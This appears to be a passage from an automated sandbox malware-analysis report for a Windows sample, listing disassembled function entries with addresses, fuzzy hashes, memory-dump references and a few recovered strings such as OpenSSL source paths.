                                  • Instruction ID: 0597b00f9cd637776b7fdcf364087cdef74824125d274fda543672af52b2cdca
                                  • Opcode Fuzzy Hash: d5fccce148f451053fc875131166697beeea20f0deaf9303a033671b56311058
                                  • Instruction Fuzzy Hash: 3AC1E371A083869BD724DF39C885B6EBBE5BFD8304F044A2EF58997242EB30E5458752
                                  Function 005FB4D0 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\evp\e_chacha20_poly1305.c
                                  • API String ID: 0-3602246229
                                  • Opcode ID: d8e2a883f7629dab14aa85ef64d9836a43015eccc819cfef5421113ccbc7d9d5
                                  • Instruction ID: 9180aac380dfad4799363b0da10de90456d222a3df6638bcaad379300d04761d
                                  • Opcode Fuzzy Hash: d8e2a883f7629dab14aa85ef64d9836a43015eccc819cfef5421113ccbc7d9d5
                                  • Instruction Fuzzy Hash: 3491D7716087519EE728DB3DC4A577AFFE0BB84305F44456FE5AA86282E738E104CBA1
                                  Function 005D26B5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000126C1,005D2018), ref: 005D26BA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 540634b229226ab70a8b0de6b5c45b606cdad73d0595cf69b80f02af657cddf8
                                  • Instruction ID: b48f02946a4fe7270abeee2bea61d8a2c3b8eaaf3dfa260c2ee41c43b74b548d
                                  • Opcode Fuzzy Hash: 540634b229226ab70a8b0de6b5c45b606cdad73d0595cf69b80f02af657cddf8
                                  • Instruction Fuzzy Hash:
                                  Function 006239F0 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ?b
                                  • API String ID: 0-525582036
                                  • Opcode ID: 529bb3fef363124c2a0a2625e4c6a8b2254767bd7c364dbe6cbbfd9987872eab
                                  • Instruction ID: bb47c936a5a6c62e8b30eac516466c6c3825d341c329f88be75ae3b8a46c42cc
                                  • Opcode Fuzzy Hash: 529bb3fef363124c2a0a2625e4c6a8b2254767bd7c364dbe6cbbfd9987872eab
                                  • Instruction Fuzzy Hash: 0B711471A083658BC710DE28D8807ABBBD6BFD5354F05096DE8D9AB342D739CA09CF91
                                  Function 0066B5AA Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 4c1298dfc29aca0bae9004ff2ce92848b2329a14e0d06d1a90405958d80da08f
                                  • Instruction ID: 94a2bc543db52b9e6f75cd85702ebd1abac712f11d6e22990314a79980366f7f
                                  • Opcode Fuzzy Hash: 4c1298dfc29aca0bae9004ff2ce92848b2329a14e0d06d1a90405958d80da08f
                                  • Instruction Fuzzy Hash: FF515771600B48D7DB345D68C6667FF6B8B9B82340F1C2419E882CB782D715DDC6CB66
                                  Function 0066B7D9 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: a6da3a0bf173b1d3ab55985976d4f44abef9db43072a62e8012d12f3f55e6eec
                                  • Instruction ID: aed7442e4813ad8505172894f647404ac564c60ecb963dfb3bf93bb1401f4a8c
                                  • Opcode Fuzzy Hash: a6da3a0bf173b1d3ab55985976d4f44abef9db43072a62e8012d12f3f55e6eec
                                  • Instruction Fuzzy Hash: CD517A71A04A45D7DF385A6884967FE27DF9B43304F18361DDA82CB382C725EDC2839A
                                  Function 006081F0 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P"j
                                  • API String ID: 0-2569550276
                                  • Opcode ID: b82a032f65255ca1db4a09a79462382e9d851baa6a69aa4e0dceef738f7882b8
                                  • Instruction ID: b51497c7da605eba8a64b61cd8993d470db46599bc74a853b5f8570df944590f
                                  • Opcode Fuzzy Hash: b82a032f65255ca1db4a09a79462382e9d851baa6a69aa4e0dceef738f7882b8
                                  • Instruction Fuzzy Hash: A6510333B549250BE71C99A99C7537A7AC3C7C5340F08863CE653C3BC2D8BCAA0692A4
                                  Function 0060C480 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Lx_
                                  • API String ID: 0-2599621165
                                  • Opcode ID: 4c3d4c01bef77621c727ab7e0c58dee84a47c5dcb5af6aaee3713792ab8fa355
                                  • Instruction ID: adac75be87f459c395a0fdd581749dac0c5068ec72375a46a92d20dce51068e5
                                  • Opcode Fuzzy Hash: 4c3d4c01bef77621c727ab7e0c58dee84a47c5dcb5af6aaee3713792ab8fa355
                                  • Instruction Fuzzy Hash: 976141712093958FD71ACF2C849046ABFE0AF96201F48869EFCD5DB347C524D909CBB2
                                  Function 0060D1B0 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: |_
                                  • API String ID: 0-2624581123
                                  • Opcode ID: 38375c339f8083709b9ec04e4acec83b0521ac57bf98c9f491ea21ddf85f2599
                                  • Instruction ID: 592020fcf09f7a992455c80d20a05c96c7c4efdfb63c0015beeb0389ee827ff8
                                  • Opcode Fuzzy Hash: 38375c339f8083709b9ec04e4acec83b0521ac57bf98c9f491ea21ddf85f2599
                                  • Instruction Fuzzy Hash: 0A615F316093918FD71ACF6D849056AFFE09F96201F488A9EF8D5DB347C524D909CBB2
                                  Function 00616190 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Strings
                                  • ..\..\openssl-1.1.0f\crypto\modes\ocb128.c, xrefs: 006161A7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\modes\ocb128.c
                                  • API String ID: 0-1267065356
                                  • Opcode ID: 848885a741b180ab4bdab84e2aec254ad072fdae3700d2c002c9d063262a759c
                                  • Instruction ID: 96fa1e7881466ceb509db9fa2e91a97e8720dccc929de6a96e87f997d53dd035
                                  • Opcode Fuzzy Hash: 848885a741b180ab4bdab84e2aec254ad072fdae3700d2c002c9d063262a759c
                                  • Instruction Fuzzy Hash: 6041DF70144395EBDB14CF61C842FE67BE8AF06308F04809EF9989B1C2C679E915DBA4
                                  Function 0063D770 Relevance: 1.0, Instructions: 973COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb396269b5e146586958e721ab2957612fc184c2263a57237ccfe1829ae1fc7c
                                  • Instruction ID: 67b02b9916ce833dbf80f9be3689f4e2577caa76b284ed2b98e38102fa9a560f
                                  • Opcode Fuzzy Hash: cb396269b5e146586958e721ab2957612fc184c2263a57237ccfe1829ae1fc7c
                                  • Instruction Fuzzy Hash: 0A829571A147644FE358CF2E8C8015ABBE2BBC8300F45472EE99ADB792D670E915DBC4
                                  Function 00618350 Relevance: 1.0, Instructions: 951COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0cdcd3c4d492764560de61dbde4139b54b4cdcde607d62e52cba6eb305810241
                                  • Instruction ID: 689d6a7dec5c662f5669be795935058cc2954c48ee1cdcf8d48db49cfc2f8f1b
                                  • Opcode Fuzzy Hash: 0cdcd3c4d492764560de61dbde4139b54b4cdcde607d62e52cba6eb305810241
                                  • Instruction Fuzzy Hash: 6B82B8306141518FD708DF1EEC9043AB7E2E78E301786967EA186D7691CB39F53ADBA0
                                  Function 006175F0 Relevance: 1.0, Instructions: 951COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bafefbe0c11be7a79604d6a866a89635201018bf272258e0516462eff418d2e7
                                  • Instruction ID: e2d72ddb91300da6d05b964990306f3f711d363753a679314429d024261547ec
                                  • Opcode Fuzzy Hash: bafefbe0c11be7a79604d6a866a89635201018bf272258e0516462eff418d2e7
                                  • Instruction Fuzzy Hash: 6182B8306141518FD708DF1EEC9043AB7E2E78E301786967EA186D7691CB39F53ADBA0
                                  Function 0060AB80 Relevance: .8, Instructions: 795COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aaada805924e684bd3e223060b5788b012fadb3525f6169ac908c75ce37fffa1
                                  • Instruction ID: 7e2e6fbcc3be97b24e1ceb8083bf4675c89c7fa642640218308ccb0fc8991dd1
                                  • Opcode Fuzzy Hash: aaada805924e684bd3e223060b5788b012fadb3525f6169ac908c75ce37fffa1
                                  • Instruction Fuzzy Hash: 0142A3B2B0C3640BDB1C8E1DDCB527EBAD36FD4304F0E856EB49783392DE6895049699
                                  Function 006190B0 Relevance: .8, Instructions: 750COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49422b099c3754261f220d4c7d4ef36a8fe3d97214b4f7078c96449d98e6645f
                                  • Instruction ID: b443bdd572416511cd85cb01b30a85ababada51590f0182660a67f9ffd6d30e3
                                  • Opcode Fuzzy Hash: 49422b099c3754261f220d4c7d4ef36a8fe3d97214b4f7078c96449d98e6645f
                                  • Instruction Fuzzy Hash: D6523D716101654FC708DF2EACA143A7792E78A301786527EE586C73D1CF79E62ACFA0
                                  Function 0064E250 Relevance: .7, Instructions: 675COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7417efe6df2ea1376c3ce2d76b94d38b9e1d07012f0762d71928b0b22de9ef65
                                  • Instruction ID: 1a4f0c21ffa6c6060927e79eb134f52caf0d3760bddee9bf86bd79ed29ffea3d
                                  • Opcode Fuzzy Hash: 7417efe6df2ea1376c3ce2d76b94d38b9e1d07012f0762d71928b0b22de9ef65
                                  • Instruction Fuzzy Hash: B462AF71A483418FC358CF5DC991B4AF7E5BFC9308F09992EE59987362E370D9848B86
                                  Function 0063E3D0 Relevance: .7, Instructions: 659COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51805aee3b5ca0aa1aac51f442decb58717be1757ea8a9a9060c57029233e147
                                  • Instruction ID: c413ca8606f41f2682354b13ab78ff4ccbcd38ca24b09618bff3b65f8f943c37
                                  • Opcode Fuzzy Hash: 51805aee3b5ca0aa1aac51f442decb58717be1757ea8a9a9060c57029233e147
                                  • Instruction Fuzzy Hash: 464262717141614BDB0CDF16E8B043AB7A3ABDE30074A866DDA475B791C634BA19CFE0
                                  Function 0063CEB0 Relevance: .7, Instructions: 659COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abba40140d220d981e92e0e2b454f72673e2f2aeffcff5a497dbc2f27e84b947
                                  • Instruction ID: ea687ee7a75f0d5ae8bf718197cce764a5de47aa16209cfa473f9a93f1566742
                                  • Opcode Fuzzy Hash: abba40140d220d981e92e0e2b454f72673e2f2aeffcff5a497dbc2f27e84b947
                                  • Instruction Fuzzy Hash: 694262B17141614BDB0CDF16E8B003AB7A3ABDE301746862DDA475B791C634BA15CFE4
                                  Function 00608B90 Relevance: .6, Instructions: 629COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
